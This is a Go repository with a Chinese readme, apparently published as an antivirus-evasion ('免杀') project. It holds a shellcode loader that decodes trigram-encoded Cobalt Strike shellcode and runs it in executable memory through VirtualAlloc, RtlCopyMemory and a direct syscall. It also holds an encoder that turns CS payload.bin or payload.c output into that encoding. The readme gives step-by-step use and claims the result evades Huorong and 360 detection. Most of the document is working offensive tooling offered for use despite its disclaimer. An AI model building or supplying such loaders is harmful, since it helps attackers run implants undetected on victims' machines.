├── bagua-de └── bagua_de.go ├── bagua-en └── bagua-en.go ├── bypass ├── bagua │ └── bagua.go └── bases │ └── bases.go ├── e&d--test └── main.go └── readme.md /bagua-de/bagua_de.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | bagua "bypass/bagua" 5 | // "fmt" 6 | "log" 7 | "os" 8 | "syscall" 9 | "unsafe" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | func banner() { 18 | fmt.Println(` 19 | # 20 | # 21 | #### ### #### # # #### #### #### #### 22 | # # # # ##### # # # # # # # # # # 23 | # # # # # # # # # # # # ### ### 24 | #### # # # # #### # # # ## # # 25 | # ### #### # #### ## # #### #### 26 | ### ### # 27 | `) 28 | } 29 | func checkErr(err error) { 30 | //如果内存调用出现错误,可以报错 31 | if err != nil { 32 | //如果调用dll系统发出警告,但是程序运行成功,则不进行警报 33 | if err.Error() != "The operation completed successfully." { 34 | //报出具体错误 35 | println(err.Error()) 36 | os.Exit(1) 37 | log.Fatal(err) 38 | } 39 | } 40 | } 41 | 42 | func runCode(code []byte) { 43 | // add 44 | VirtualAlloc := syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc") 45 | RtlCopyMemory := syscall.NewLazyDLL("ntdll.dll").NewProc("RtlCopyMemory") 46 | 47 | //调用VirtualAlloc为shellcode申请一块内存 48 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(code)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 49 | if addr == 0 { 50 | checkErr(err) 51 | } 52 | //调用RtlCopyMemory来将shellcode加载进内存当中 53 | _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&code[0])), uintptr(len(code))) 54 | checkErr(err) 55 | //syscall来运行shellcode 56 | syscall.Syscall(addr, 0, 0, 0, 0) 57 | } 58 | 59 | func main() { 60 | banner() 61 | // reader := bufio.NewReader(os.Stdin) // 从标准输入生成读对象 62 | // fmt.Print("请输入shellcode:") 63 | // shellcode, _ := reader.ReadString('\n') // 读到换行 64 | // shellcode = strings.TrimSpace(shellcode) 65 | // fmt.Printf("%#v\n", shellcode) 66 | 67 | // 编码中的shellcode 68 | shellcode := "" 69 | // 解码 70 | shell := bagua.Bagua_de(string(shellcode)) 71 | // fmt.Println(string(shell)) 72 | // shell := string(decode) 73 | // fmt.Println(shell) 74 | // 编译命令 75 | // go build -trimpath -ldflags="-w -s -H=windowsgui" 76 | 77 | // 上线 78 | runCode(shell) 79 | } 80 | -------------------------------------------------------------------------------- /bagua-en/bagua-en.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | bagua "bypass/bagua" 6 | "encoding/hex" 7 | "flag" 8 | "fmt" 9 | "io" 10 | "io/ioutil" 11 | "os" 12 | "path" 13 | "regexp" 14 | "strings" 15 | ) 16 | 17 | var ( 18 | // 定义命令行解析参数 19 | h bool 20 | v bool 21 | e string 22 | //c string 23 | f string 24 | ) 25 | 26 | func banner() { 27 | fmt.Println(` 28 | # 29 | # 30 | #### ### #### # # #### #### #### #### 31 | # # # # ##### # # # # # # # # # # 32 | # # # # # # # # # # # # ### ### 33 | #### # # # # #### # # # ## # # 34 | # ### #### # #### ## # #### #### 35 | ### ### # 36 | `) 37 | } 38 | func init() { 39 | banner() 40 | flag.BoolVar(&h, "h", false, "this help `message`") 41 | flag.BoolVar(&v, "v", false, "show `version` and exit") 42 | 43 | // 注意 `shellcode`。默认是 -s string,有了 `shellcode` 之后,变为 -s shellcode 44 | // flag.StringVar(&e, "e", "des,rc4,aes,3des,base64", "specify `encryption` mode;You can specify more than one at a time, separated by commas, and the last one must use base64 encoding") 45 | //flag.StringVar(&c, "c", "", "`shellcode`") 46 | flag.StringVar(&f, "f", "", "shellcode file,ex:`payload.bin`") 47 | 48 | // 改变默认的 Usage 49 | flag.Usage = usage 50 | 51 | } 52 | 53 | func usage() { 54 | fmt.Fprintf(os.Stderr, `version: 1.0 55 | Usage: [-v] [-h] [-f shellcode filename] 56 | 57 | Options: 58 | `) 59 | flag.PrintDefaults() 60 | } 61 | 62 | func CmdStart() { 63 | //go build -trimpath -ldflags="-w -s -H=windowsgui" 64 | flag.Parse() 65 | //定义byte[]类型的shellcode,初始化的数据随便写的 66 | shellcode := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52} 67 | //如果存在未解析的参数, 退出程序 68 | if len(flag.Args()) != 0 { 69 | os.Exit(3) 70 | } 71 | if h { 72 | flag.Usage() 73 | } else if v { 74 | fmt.Println("version: 1.0") 75 | } else { 76 | var shell string 77 | if len(f) == 0 { 78 | os.Exit(3) 79 | } 80 | if strings.EqualFold(path.Ext(path.Base(f)), ".bin") { 81 | //CS通过Raw生成的payload.bin中的shellcode可以通过该方式直接读取 82 | shellcodeFileData, err := ioutil.ReadFile(f) 83 | checkError(err) 84 | shellcode = shellcodeFileData 85 | fmt.Println(shellcode) 86 | } else if strings.EqualFold(path.Ext(path.Base(f)), ".c") { 87 | //CS生成C语言的payload.c中的shellcode可以通过该方式读取 88 | file, err := os.OpenFile(f, os.O_RDWR, 0666) 89 | if err != nil { 90 | fmt.Println("Open file error!", err) 91 | return 92 | } 93 | // fmt.Println(file) 94 | defer file.Close() 95 | 96 | stat, err := file.Stat() 97 | if err != nil { 98 | panic(err) 99 | } 100 | var size = stat.Size() 101 | fmt.Println("file size=", size) 102 | filestr := "" 103 | buf := bufio.NewReader(file) 104 | for { 105 | line, err := buf.ReadString('\n') 106 | line = strings.TrimSpace(line) 107 | //fmt.Println(line) 108 | filestr += line 109 | if err != nil { 110 | if err == io.EOF { 111 | r, _ := regexp.Compile("\"(.*)\"") 112 | //fmt.Println(r.FindString(filestr)) 113 | strReplaceAll := strings.ReplaceAll(r.FindString(filestr), "\\x", "") 114 | strReplaceAll = strings.ReplaceAll(strReplaceAll, "\"", "") 115 | //fmt.Println(strReplaceAll) 116 | shellcode, err = hex.DecodeString(strReplaceAll) 117 | if err != nil { 118 | fmt.Println(err) 119 | } 120 | fmt.Println("File read ok!") 121 | break 122 | } else { 123 | fmt.Println("Read file error!", err) 124 | return 125 | } 126 | } 127 | } 128 | } 129 | 130 | // fmt.Println(shell) 131 | // strbytes := []byte(shellcode) 132 | shell = bagua.Bagua_en([]byte(shellcode)) 133 | // fmt.Println(shell) 134 | shellcode = []byte(shell) 135 | // fmt.Println(string(shellcode)) 136 | fmt.Println(shell) 137 | } 138 | 139 | } 140 | 141 | func checkError(err error) { 142 | //如果内存调用出现错误,可以报错 143 | if err != nil { 144 | //如果调用dll系统发出警告,但是程序运行成功,则不进行警报 145 | if err.Error() != "The operation completed successfully." { 146 | //报出具体错误 147 | println(err.Error()) 148 | os.Exit(1) 149 | } 150 | } 151 | } 152 | 153 | func main() { 154 | CmdStart() 155 | } 156 | -------------------------------------------------------------------------------- /bypass/bagua/bagua.go: -------------------------------------------------------------------------------- 1 | package bypass 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "os" 7 | "strconv" 8 | "strings" 9 | ) 10 | 11 | const ( 12 | qian = "☰" // 乾 13 | dui = "☱" // 兑 14 | li = "☲" // 离 15 | zhen = "☳" // 震 16 | xun = "☴" // 巽 17 | kan = "☵" // 坎 18 | gen = "☶" // 艮 19 | kun = "☷" // 坤 20 | ) 21 | 22 | var m1 = map[int]string{ 23 | 0: qian, 24 | 1: dui, 25 | 2: li, 26 | 3: zhen, 27 | 4: xun, 28 | 5: kan, 29 | 6: gen, 30 | 7: kun, 31 | } 32 | 33 | var m2 = map[string][3]int{ 34 | qian: {0, 0, 0}, 35 | dui: {0, 0, 1}, 36 | li: {0, 1, 0}, 37 | zhen: {0, 1, 1}, 38 | xun: {1, 0, 0}, 39 | kan: {1, 0, 1}, 40 | gen: {1, 1, 0}, 41 | kun: {1, 1, 1}, 42 | } 43 | 44 | func encode(src []byte) string { 45 | bs := make([]int, len(src)*8) 46 | bl := len(bs) 47 | for k, v := range src { 48 | byteTo2(int(v), bs[k*8:k*8+8]) 49 | } 50 | 51 | buf := make([]string, (bl+2)/3) 52 | for i := 0; i*3+2 < len(bs); i++ { 53 | buf[i] = m1[bs[i*3]<<2+bs[i*3+1]<<1+bs[i*3+2]] 54 | } 55 | 56 | switch bl % 3 { 57 | case 1: 58 | buf[(bl+2)/3-1] = m1[bs[bl-1]<<2] 59 | case 2: 60 | buf[(bl+2)/3-1] = m1[bs[bl-2]<<2+bs[bl-1]<<1] 61 | } 62 | 63 | return strings.Join(buf, "") 64 | } 65 | 66 | func decode(s string) ([]byte, error) { 67 | if s == "" { 68 | return nil, nil 69 | } 70 | 71 | sl := len(s) 72 | 73 | is := make([]int, sl) 74 | for i := 0; i < sl/3; i++ { 75 | b, ok := m2[s[i*3:i*3+3]] 76 | if !ok { 77 | return nil, errors.New("invalid string, cur: " + strconv.Itoa(i)) 78 | } 79 | copy(is[i*3:i*3+3], b[:]) 80 | } 81 | 82 | buf := make([]byte, sl/8) 83 | for i := 0; i < sl/8; i++ { 84 | buf[i] = b8ToByte(is[i*8 : i*8+8]) 85 | } 86 | 87 | return buf, nil 88 | } 89 | 90 | func b8ToByte(b []int) byte { 91 | return byte(b[0]<<7 + b[1]<<6 + b[2]<<5 + b[3]<<4 + b[4]<<3 + b[5]<<2 + b[6]<<1 + b[7]) 92 | } 93 | 94 | func byteTo2(byt int, dst []int) { 95 | var i = 7 96 | for byt != 0 { 97 | dst[i] = byt % 2 98 | byt = byt >> 1 99 | i-- 100 | } 101 | return 102 | } 103 | 104 | //加密 105 | func Bagua_en(s []byte) string { 106 | result := encode(s) 107 | return result 108 | } 109 | 110 | //解密 111 | func Bagua_de(s string) []byte { 112 | result, err := decode(s) 113 | if err != nil { 114 | fmt.Fprintln(os.Stderr, err.Error()) 115 | os.Exit(1) 116 | } 117 | return result 118 | } -------------------------------------------------------------------------------- /bypass/bases/bases.go: -------------------------------------------------------------------------------- 1 | package bypass 2 | 3 | import ( 4 | "encoding/base64" 5 | // "fmt" 6 | ) 7 | 8 | 9 | func Base_en(str string) string{ 10 | strbytes := []byte(str) 11 | encoded := base64.StdEncoding.EncodeToString(strbytes) 12 | // fmt.Println(encoded) 13 | return encoded 14 | } 15 | 16 | func Base_de(str string) string{ 17 | strbytes := str 18 | decoded, _ := base64.StdEncoding.DecodeString(strbytes) 19 | decodestr := string(decoded) 20 | // fmt.Println(decodestr) 21 | return decodestr 22 | } 23 | 24 | // func main() { 25 | // Encode("qwe") 26 | // } 27 | -------------------------------------------------------------------------------- /e&d--test/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | bases "bypass/bagua" 5 | "fmt" 6 | ) 7 | 8 | func main() { 9 | fmt.Println("-------------------") 10 | fmt.Println("cs-shellcode加解密") 11 | 12 | var str = "cs-shellcode加解密" 13 | strbytes := []byte(str) 14 | red := bases.Bagua_en(strbytes) 15 | fmt.Println("加密", red) 16 | 17 | ref := bases.Bagua_de(red) 18 | fmt.Println("解密", string(ref)) 19 | } 20 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # go-bypass 2 | go语言免杀项目。 3 | 声明:该项目来自作者日常学习笔记。 请勿利用相关技术以及工具从事非法测试,如因此产生的一切不良后果作者无关。 4 | --- 5 | ##### 如果你觉得此项目对您有用,请给作者点个star 6 | --- 7 | ## 使用方式: 8 | --- 9 | 报错:`bagua-en.go:5:2: package bypass/bagua is not in GOROOT (C:\Program Files\Go\src\bypass\bagua)` 10 | 11 | 解决: 12 | 包在项目目录:"\bypass\bagua" 中, 13 | 请将bypass目录文件-移动致您本地的GOROOT目录src下,或者将bypass目录文件-分别移动至bagua-en和bagua-de目录下。 14 | --- 15 | --- 16 | ## 生成免杀方式: 17 | --- 18 | 1、用bagua_en对CS生成的shellcode进行加密 19 | ![image](https://user-images.githubusercontent.com/94209165/196105104-b3c7f3d2-d341-43bd-93fb-bb9d25741f2b.png) 20 | 2、复制密文到bagua_de.go中shellcode变量 21 | ![image](https://user-images.githubusercontent.com/94209165/196104848-309c2271-db3b-489d-8731-e3b1849590b2.png) 22 | 3、执行bagua_de.go代码后成功上线 23 | ![image](https://user-images.githubusercontent.com/94209165/196105167-a423c576-97ea-40a8-a9fa-b13e943d7da3.png) 24 | ![image](https://user-images.githubusercontent.com/94209165/196105220-05868c4d-e88e-47cf-b06a-fb4e44c1f5fa.png) 25 | 4、编译后测试免杀效果。 26 | ![image](https://user-images.githubusercontent.com/94209165/196105259-bc83e505-868f-4558-95fe-fb0e9d52115a.png) 27 | 成功绕过火绒静态 28 | ![image](https://user-images.githubusercontent.com/94209165/196105274-af7a6ff3-ff64-4604-88dc-9b5d757c38c3.png) 29 | 成功绕过火绒动态 30 | ![image](https://user-images.githubusercontent.com/94209165/196105323-3f11ca8d-89f6-4da6-8760-90f0e57ef004.png) 31 | --- 32 | --- 33 | 34 | 主要分享一下免杀思路,目前只测试360和火绒动静态全过,其他自测。Golang小白,大佬们轻喷~ 35 | --------------------------------------------------------------------------------